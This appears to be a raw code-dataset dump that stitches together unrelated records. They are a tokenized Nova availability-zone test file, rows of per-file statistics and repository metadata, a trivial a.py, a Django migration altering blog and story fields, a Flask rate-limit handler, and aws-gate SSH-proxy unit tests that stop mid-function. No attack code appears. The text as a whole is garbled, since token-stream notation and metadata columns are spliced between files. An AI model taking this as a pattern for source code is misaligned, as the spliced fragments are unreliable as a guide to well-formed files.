op|'.'
name|'_destroy_service'
op|'('
name|'service'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_availability_zone_unicode_key
dedent|''
name|'def'
name|'test_set_availability_zone_unicode_key'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test set availability zone cache key is unicode."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'network'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'services'
op|'='
name|'db'
op|'.'
name|'service_get_all'
op|'('
name|'self'
op|'.'
name|'context'
op|')'
newline|'\n'
name|'az'
op|'.'
name|'set_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'services'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'services'
op|'['
number|'0'
op|']'
op|'['
string|"'host'"
op|']'
op|','
name|'six'
op|'.'
name|'text_type'
op|')'
newline|'\n'
name|'cached_key'
op|'='
name|'az'
op|'.'
name|'_make_cache_key'
op|'('
name|'services'
op|'['
number|'0'
op|']'
op|'['
string|"'host'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'cached_key'
op|','
name|'str'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_destroy_service'
op|'('
name|'service'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_availability_zone_not_compute_service
dedent|''
name|'def'
name|'test_set_availability_zone_not_compute_service'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test not compute service get right availability zone."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'network'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'services'
op|'='
name|'db'
op|'.'
name|'service_get_all'
op|'('
name|'self'
op|'.'
name|'context'
op|')'
newline|'\n'
name|'new_service'
op|'='
name|'az'
op|'.'
name|'set_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'services'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'default_in_az'
op|','
name|'new_service'
op|'['
string|"'availability_zone'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_destroy_service'
op|'('
name|'service'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_host_availability_zone
dedent|''
name|'def'
name|'test_get_host_availability_zone'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get right availability zone by given host."""'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'default_az'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'availability_zone'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_update_host_availability_zone
dedent|''
name|'def'
name|'test_update_host_availability_zone'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test availability zone could be update by given host."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
nl|'\n'
comment|'# Create a new aggregate with an AZ and add the host to the AZ'
nl|'\n'
name|'az_name'
op|'='
string|"'az1'"
newline|'\n'
name|'agg_az1'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'agg-az1'"
op|','
name|'az_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'agg_az1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'az_name'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
comment|'# Update AZ'
nl|'\n'
name|'new_az_name'
op|'='
string|"'az2'"
newline|'\n'
name|'self'
op|'.'
name|'_update_az'
op|'('
name|'agg_az1'
op|','
name|'new_az_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'new_az_name'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_delete_host_availability_zone
dedent|''
name|'def'
name|'test_delete_host_availability_zone'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test availability zone could be deleted successfully."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
nl|'\n'
comment|'# Create a new aggregate with an AZ and add the host to the AZ'
nl|'\n'
name|'az_name'
op|'='
string|"'az1'"
newline|'\n'
name|'agg_az1'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'agg-az1'"
op|','
name|'az_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'agg_az1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'az_name'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
comment|'# Delete the AZ via deleting the aggregate'
nl|'\n'
name|'self'
op|'.'
name|'_delete_from_aggregate'
op|'('
name|'service'
op|','
name|'agg_az1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'default_az'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_host_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_availability_zones
dedent|''
name|'def'
name|'test_get_availability_zones'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get_availability_zones."""'
newline|'\n'
nl|'\n'
comment|'# When the param get_only_available of get_availability_zones is set'
nl|'\n'
comment|'# to default False, it returns two lists, zones with at least one'
nl|'\n'
comment|'# enabled services, and zones with no enabled services,'
nl|'\n'
comment|'# when get_only_available is set to True, only return a list of zones'
nl|'\n'
comment|'# with at least one enabled services.'
nl|'\n'
comment|'# Use the following test data:'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# zone host enabled'
nl|'\n'
comment|'# nova-test host1 Yes'
nl|'\n'
comment|'# nova-test host2 No'
nl|'\n'
comment|'# nova-test2 host3 Yes'
nl|'\n'
comment|'# nova-test3 host4 No'
nl|'\n'
comment|'# <default> host5 No'
nl|'\n'
nl|'\n'
name|'agg2'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'agg-az2'"
op|','
string|"'nova-test2'"
op|')'
newline|'\n'
name|'agg3'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'agg-az3'"
op|','
string|"'nova-test3'"
op|')'
newline|'\n'
nl|'\n'
name|'service1'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
string|"'host1'"
op|','
nl|'\n'
name|'disabled'
op|'='
name|'False'
op|')'
newline|'\n'
name|'service2'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
string|"'host2'"
op|','
nl|'\n'
name|'disabled'
op|'='
name|'True'
op|')'
newline|'\n'
name|'service3'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
string|"'host3'"
op|','
nl|'\n'
name|'disabled'
op|'='
name|'False'
op|')'
newline|'\n'
name|'service4'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
string|"'host4'"
op|','
nl|'\n'
name|'disabled'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
string|"'host5'"
op|','
nl|'\n'
name|'disabled'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service1'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service2'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service3'
op|','
name|'agg2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service4'
op|','
name|'agg3'
op|')'
newline|'\n'
nl|'\n'
name|'zones'
op|','
name|'not_zones'
op|'='
name|'az'
op|'.'
name|'get_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
string|"'nova-test'"
op|','
string|"'nova-test2'"
op|']'
op|','
name|'zones'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
string|"'nova-test3'"
op|','
string|"'nova'"
op|']'
op|','
name|'not_zones'
op|')'
newline|'\n'
nl|'\n'
name|'zones'
op|'='
name|'az'
op|'.'
name|'get_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'True'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
string|"'nova-test'"
op|','
string|"'nova-test2'"
op|']'
op|','
name|'zones'
op|')'
newline|'\n'
nl|'\n'
name|'zones'
op|','
name|'not_zones'
op|'='
name|'az'
op|'.'
name|'get_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
nl|'\n'
name|'with_hosts'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertJsonEqual'
op|'('
name|'zones'
op|','
nl|'\n'
op|'['
op|'('
string|"u'nova-test2'"
op|','
name|'set'
op|'('
op|'['
string|"u'host3'"
op|']'
op|')'
op|')'
op|','
nl|'\n'
op|'('
string|"u'nova-test'"
op|','
name|'set'
op|'('
op|'['
string|"u'host1'"
op|']'
op|')'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertJsonEqual'
op|'('
name|'not_zones'
op|','
nl|'\n'
op|'['
op|'('
string|"u'nova-test3'"
op|','
name|'set'
op|'('
op|'['
string|"u'host4'"
op|']'
op|')'
op|')'
op|','
nl|'\n'
op|'('
string|"u'nova'"
op|','
name|'set'
op|'('
op|'['
string|"u'host5'"
op|']'
op|')'
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_instance_availability_zone_default_value
dedent|''
name|'def'
name|'test_get_instance_availability_zone_default_value'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get right availability zone by given an instance."""'
newline|'\n'
name|'fake_inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'host'
op|'='
name|'self'
op|'.'
name|'host'
op|','
nl|'\n'
name|'availability_zone'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'default_az'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_instance_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'fake_inst'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_instance_availability_zone_from_aggregate
dedent|''
name|'def'
name|'test_get_instance_availability_zone_from_aggregate'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get availability zone from aggregate by given an instance."""'
newline|'\n'
name|'host'
op|'='
string|"'host170'"
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'host'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
nl|'\n'
name|'fake_inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'host'
op|'='
name|'host'
op|','
nl|'\n'
name|'availability_zone'
op|'='
name|'self'
op|'.'
name|'availability_zone'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'availability_zone'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_instance_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'fake_inst'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'az'
op|'.'
name|'_get_cache'
op|'('
op|')'
op|','
string|"'get'"
op|')'
newline|'\n'
DECL|member|test_get_instance_availability_zone_cache_differs
name|'def'
name|'test_get_instance_availability_zone_cache_differs'
op|'('
name|'self'
op|','
name|'cache_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
string|"'host170'"
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'host'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
name|'cache_get'
op|'.'
name|'return_value'
op|'='
name|'self'
op|'.'
name|'default_az'
newline|'\n'
nl|'\n'
name|'fake_inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'host'
op|'='
name|'host'
op|','
nl|'\n'
name|'availability_zone'
op|'='
name|'self'
op|'.'
name|'availability_zone'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
nl|'\n'
name|'self'
op|'.'
name|'availability_zone'
op|','
nl|'\n'
name|'az'
op|'.'
name|'get_instance_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'fake_inst'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_instance_availability_zone_no_host
dedent|''
name|'def'
name|'test_get_instance_availability_zone_no_host'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get availability zone from instance if host not set."""'
newline|'\n'
name|'fake_inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'host'
op|'='
name|'None'
op|','
name|'availability_zone'
op|'='
string|"'inst-az'"
op|')'
newline|'\n'
nl|'\n'
name|'result'
op|'='
name|'az'
op|'.'
name|'get_instance_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'fake_inst'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'inst-az'"
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_instance_availability_zone_no_host_no_az
dedent|''
name|'def'
name|'test_get_instance_availability_zone_no_host_no_az'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test get availability zone if neither host nor az is set."""'
newline|'\n'
name|'fake_inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
name|'host'
op|'='
name|'None'
op|','
name|'availability_zone'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'result'
op|'='
name|'az'
op|'.'
name|'get_instance_availability_zone'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'fake_inst'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'result'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 13.175156
| 88
| 0.618644
| 3,802
| 25,349
| 3.996581
| 0.055497
| 0.176505
| 0.103982
| 0.129911
| 0.857124
| 0.813425
| 0.773215
| 0.739651
| 0.692596
| 0.645081
| 0
| 0.003241
| 0.099333
| 25,349
| 1,923
| 89
| 13.182007
| 0.662301
| 0
| 0
| 0.931877
| 0
| 0
| 0.396623
| 0.069431
| 0
| 0
| 0
| 0
| 0.012481
| 0
| null | null | 0
| 0.00416
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c059d2f185b5dafc600d8726e5c78f2a679dd8ad
| 71
|
py
|
Python
|
command/test/integration/fake_repository/commit_005/a.py
|
s-pace/pyre-check
|
2b71dcf22e4672567cfe0dfef356f11646d66244
|
[
"MIT"
] | 5
|
2019-02-14T19:46:47.000Z
|
2020-01-16T05:48:45.000Z
|
command/test/integration/fake_repository/commit_005/a.py
|
s-pace/pyre-check
|
2b71dcf22e4672567cfe0dfef356f11646d66244
|
[
"MIT"
] | 4
|
2022-02-15T02:42:33.000Z
|
2022-02-28T01:30:07.000Z
|
command/test/integration/fake_repository/commit_005/a.py
|
s-pace/pyre-check
|
2b71dcf22e4672567cfe0dfef356f11646d66244
|
[
"MIT"
] | 2
|
2019-02-14T19:46:23.000Z
|
2020-07-13T03:53:04.000Z
|
#!/usr/bin/env python3
import b
def foo() -> int:
return b.bar()
| 10.142857
| 22
| 0.591549
| 12
| 71
| 3.5
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018182
| 0.225352
| 71
| 6
| 23
| 11.833333
| 0.745455
| 0.295775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2215a0a692e7097758940c570b8c3679dbb7ce6e
| 5,315
|
py
|
Python
|
blogs/migrations/0007_auto_20210828_0834.py
|
zain-Z/humimp
|
fd7e4e211dce62639e2fce2dd9f9506240a7a3d9
|
[
"MIT"
] | null | null | null |
blogs/migrations/0007_auto_20210828_0834.py
|
zain-Z/humimp
|
fd7e4e211dce62639e2fce2dd9f9506240a7a3d9
|
[
"MIT"
] | null | null | null |
blogs/migrations/0007_auto_20210828_0834.py
|
zain-Z/humimp
|
fd7e4e211dce62639e2fce2dd9f9506240a7a3d9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.6 on 2021-08-28 06:34
import blogs.validators
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogs', '0006_auto_20210825_1547'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='blogs_date',
field=models.DateField(blank=True, default=datetime.date.today),
),
migrations.AlterField(
model_name='blog',
name='blogs_desc',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='blog',
name='blogs_image',
field=models.FileField(blank=True, default='', upload_to='background/blogs/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='blog',
name='blogs_location',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storyandblog',
name='image_bg_blogs',
field=models.FileField(blank=True, default='', upload_to='background/stories_and_blogs/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='storyandblog',
name='image_bg_stories',
field=models.FileField(blank=True, default='', upload_to='background/stories_and_blogs/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='storyandblog',
name='text_bg_blogs',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storyandblog',
name='text_bg_stories',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_date',
field=models.DateField(blank=True, default=datetime.date.today),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc1',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc2',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc3',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc4',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc5',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc6',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_desc7',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_image_one',
field=models.FileField(blank=True, default='', upload_to='background/stories_detail/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='storydetail',
name='story_image_three',
field=models.FileField(blank=True, default='', upload_to='background/stories_detail/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='storydetail',
name='story_image_two',
field=models.FileField(blank=True, default='', upload_to='background/stories_detail/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='storydetail',
name='story_location',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='storydetail',
name='story_name',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='team',
name='teams_desc',
field=models.CharField(blank=True, default='', max_length=300),
),
migrations.AlterField(
model_name='team',
name='teams_image',
field=models.FileField(blank=True, default='', upload_to='background/team/', validators=[blogs.validators.validate_image_extension]),
),
migrations.AlterField(
model_name='team',
name='teams_name',
field=models.CharField(blank=True, default='', max_length=300),
),
]
| 39.080882
| 158
| 0.595861
| 505
| 5,315
| 6.071287
| 0.142574
| 0.156556
| 0.195695
| 0.227006
| 0.916177
| 0.916177
| 0.916177
| 0.878995
| 0.868885
| 0.868885
| 0
| 0.021637
| 0.278269
| 5,315
| 135
| 159
| 39.37037
| 0.777633
| 0.008467
| 0
| 0.728682
| 1
| 0
| 0.134396
| 0.030182
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.046512
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2246a564d58ca90cd85ef9d55725cd62710f98c4
| 188
|
py
|
Python
|
app/routes/errors.py
|
zalando-zmon/zmon-slo-metrics
|
f2e823b861af2f449d1fd72cced74cf26b3aee94
|
[
"Apache-2.0"
] | 8
|
2017-02-21T09:45:01.000Z
|
2020-09-18T00:09:42.000Z
|
app/routes/errors.py
|
ThorbjoernG/service-level-reporting
|
d9ec7dca3fee1614bf39cb46af9c0cc8bfbd805e
|
[
"Apache-2.0"
] | 148
|
2017-02-20T08:52:32.000Z
|
2020-03-10T09:43:40.000Z
|
app/routes/errors.py
|
lfroment0/service-level-reporting
|
29d6d0664762c76eb5aa7000a8c191c32cc2c015
|
[
"Apache-2.0"
] | 12
|
2017-02-20T07:24:21.000Z
|
2019-09-27T12:32:33.000Z
|
from flask import jsonify, make_response
def rate_limit_exceeded(e):
return make_response(jsonify(title='Rate limit exceeded', detail='Rate limit exceeded. Too many requests'), 429)
| 31.333333
| 116
| 0.781915
| 27
| 188
| 5.296296
| 0.666667
| 0.188811
| 0.356643
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018293
| 0.12766
| 188
| 5
| 117
| 37.6
| 0.853659
| 0
| 0
| 0
| 0
| 0
| 0.303191
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
225011995916e16a3304b4fb6ec8c54eb071795f
| 5,196
|
py
|
Python
|
tests/unit/test_ssh_proxy.py
|
ckornacker/aws-gate
|
9c5b797986c5973d811d578161293a102dfdb51d
|
[
"BSD-3-Clause"
] | 369
|
2018-11-20T16:00:27.000Z
|
2022-03-30T21:36:41.000Z
|
tests/unit/test_ssh_proxy.py
|
ckornacker/aws-gate
|
9c5b797986c5973d811d578161293a102dfdb51d
|
[
"BSD-3-Clause"
] | 1,234
|
2018-11-19T00:02:38.000Z
|
2022-03-31T04:02:33.000Z
|
tests/unit/test_ssh_proxy.py
|
ckornacker/aws-gate
|
9c5b797986c5973d811d578161293a102dfdb51d
|
[
"BSD-3-Clause"
] | 35
|
2019-01-04T22:52:39.000Z
|
2022-03-30T21:36:43.000Z
|
import pytest
from aws_gate.ssh_proxy import SshProxySession, ssh_proxy
def test_create_ssh_proxy_session(ssm_mock, instance_id):
sess = SshProxySession(instance_id=instance_id, ssm=ssm_mock)
sess.create()
assert ssm_mock.start_session.called
def test_terminate_ssh_proxy_session(ssm_mock, instance_id):
sess = SshProxySession(instance_id=instance_id, ssm=ssm_mock)
sess.create()
sess.terminate()
assert ssm_mock.terminate_session.called
def test_open_ssh_proxy_session(mocker, instance_id, ssm_mock):
m = mocker.patch("aws_gate.session_common.execute_plugin", return_value="output")
sess = SshProxySession(instance_id=instance_id, ssm=ssm_mock)
sess.open()
assert m.called
def test_ssh_proxy_session_context_manager(ssm_mock, instance_id):
with SshProxySession(instance_id=instance_id, ssm=ssm_mock):
pass
assert ssm_mock.start_session.called
assert ssm_mock.terminate_session.called
def test_ssh_proxy_session(
mocker, instance_id, ssh_key, get_instance_details_response, config
):
mocker.patch("aws_gate.ssh_proxy.get_aws_client")
mocker.patch("aws_gate.ssh_proxy.get_aws_resource")
mocker.patch("aws_gate.ssh_proxy.query_instance", return_value=instance_id)
mocker.patch("aws_gate.ssh_proxy.SshKey", return_value=ssh_key)
mocker.patch("aws_gate.ssh_proxy.SshKeyUploader", return_value=mocker.MagicMock())
mocker.patch(
"aws_gate.ssh_proxy.get_instance_details",
return_value=get_instance_details_response,
)
session_mock = mocker.patch(
"aws_gate.ssh_proxy.SshProxySession", return_value=mocker.MagicMock()
)
mocker.patch("aws_gate.decorators.is_existing_profile", return_value=True)
mocker.patch("aws_gate.decorators._plugin_exists", return_value=True)
mocker.patch("aws_gate.decorators.execute_plugin", return_value="1.1.23.0")
ssh_proxy(
config=config,
instance_name=instance_id,
profile_name="default",
region_name="eu-west-1",
)
assert session_mock.called
def test_ssh_proxy_exception_invalid_profile(mocker, instance_id, ssh_key, config):
mocker.patch("aws_gate.ssh_proxy.get_aws_client")
mocker.patch("aws_gate.ssh_proxy.get_aws_resource")
mocker.patch("aws_gate.ssh_proxy.query_instance", return_value=instance_id)
mocker.patch("aws_gate.ssh_proxy.SshKey", return_value=ssh_key)
mocker.patch("aws_gate.decorators.is_existing_region", return_value=True)
mocker.patch("aws_gate.decorators._plugin_exists", return_value=True)
mocker.patch("aws_gate.decorators.execute_plugin", return_value="1.1.23.0")
with pytest.raises(ValueError):
ssh_proxy(
config=config,
profile_name="invalid-profile",
instance_name=instance_id,
region_name="eu-west-1",
)
def test_ssh_proxy_exception_invalid_region(mocker, instance_id, ssh_key, config):
mocker.patch("aws_gate.ssh_proxy.get_aws_client")
mocker.patch("aws_gate.ssh_proxy.get_aws_resource")
mocker.patch("aws_gate.ssh_proxy.query_instance", return_value=instance_id)
mocker.patch("aws_gate.ssh_proxy.SshKey", return_value=ssh_key)
mocker.patch("aws_gate.decorators.is_existing_profile", return_value=True)
mocker.patch("aws_gate.decorators._plugin_exists", return_value=True)
mocker.patch("aws_gate.decorators.execute_plugin", return_value="1.1.23.0")
with pytest.raises(ValueError):
ssh_proxy(
config=config,
region_name="invalid-region",
instance_name=instance_id,
profile_name="default",
)
def test_ssh_proxy_exception_unknown_instance_id(mocker, ssh_key, instance_id, config):
mocker.patch("aws_gate.ssh_proxy.get_aws_client")
mocker.patch("aws_gate.ssh_proxy.get_aws_resource")
mocker.patch("aws_gate.ssh_proxy.query_instance", return_value=None)
mocker.patch("aws_gate.ssh_proxy.SshKey", return_value=ssh_key)
mocker.patch("aws_gate.decorators._plugin_exists", return_value=True)
mocker.patch("aws_gate.decorators.execute_plugin", return_value="1.1.23.0")
